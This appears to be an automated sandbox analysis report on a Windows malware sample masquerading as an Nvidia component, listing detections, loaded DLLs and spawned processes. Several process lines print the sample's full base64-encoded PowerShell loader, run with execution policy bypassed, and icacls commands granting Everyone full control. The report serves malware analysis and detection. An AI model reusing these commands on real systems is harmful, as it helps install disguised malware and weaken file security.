Source: Process Memory Space: powershell.exe PID: 348, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: PVKDyWHOaX.exe, 00000000.00000002.4591980859.00000000014FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
Source: classification engineClassification label: mal100.bank.evad.winEXE@13/16@1/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F27E10 CoCreateInstance,2_2_00007FF848F27E10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
Source: C:\Nvidia-75619\Nvidia-75619.exeMutant created: \Sessions\1\BaseNamedObjects\76FDF9182024
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_unklz4k5.ef0.ps1Jump to behavior
Source: PVKDyWHOaX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Nvidia-75619\Nvidia-75619.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Nvidia-75619\Nvidia-75619.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: PVKDyWHOaX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PVKDyWHOaX.exeVirustotal: Detection: 25%
Source: PVKDyWHOaX.exeReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Users\user\Desktop\PVKDyWHOaX.exe "C:\Users\user\Desktop\PVKDyWHOaX.exe"
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619\Nvidia-75619.exe /grant Everyone:F /T /C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-75619\Nvidia-75619.exe "C:\Nvidia-75619\Nvidia-75619.exe"
Source: unknownProcess created: C:\Nvidia-75619\Nvidia-75619.exe "C:\Nvidia-75619\Nvidia-75619.exe"
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwAyAGMAYgBiADYANQA0AGUALQA1AGMANgA0AC0ANAAzADkANwAtADkAMwA5ADUALQAzAGYANgA0ADEANQA2ADgAMwAwAGYAYQAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEQAZQBzAGsAdABvAHAAXABQAFYASwBEAHkAVwBIAE8AYQBYAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0AJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619 /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-75619\Nvidia-75619.exe /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-75619\Nvidia-75619.exe "C:\Nvidia-75619\Nvidia-75619.exe" Jump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\PVKDyWHOaX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: python313.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: magnification.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: version.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wldp.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: netutils.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: security.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: secur32.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: olepro32.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: amsi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: userenv.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: profapi.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: sxs.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Nvidia-75619\Nvidia-75619.exeSection loaded: winhttp.dllJump to behavior
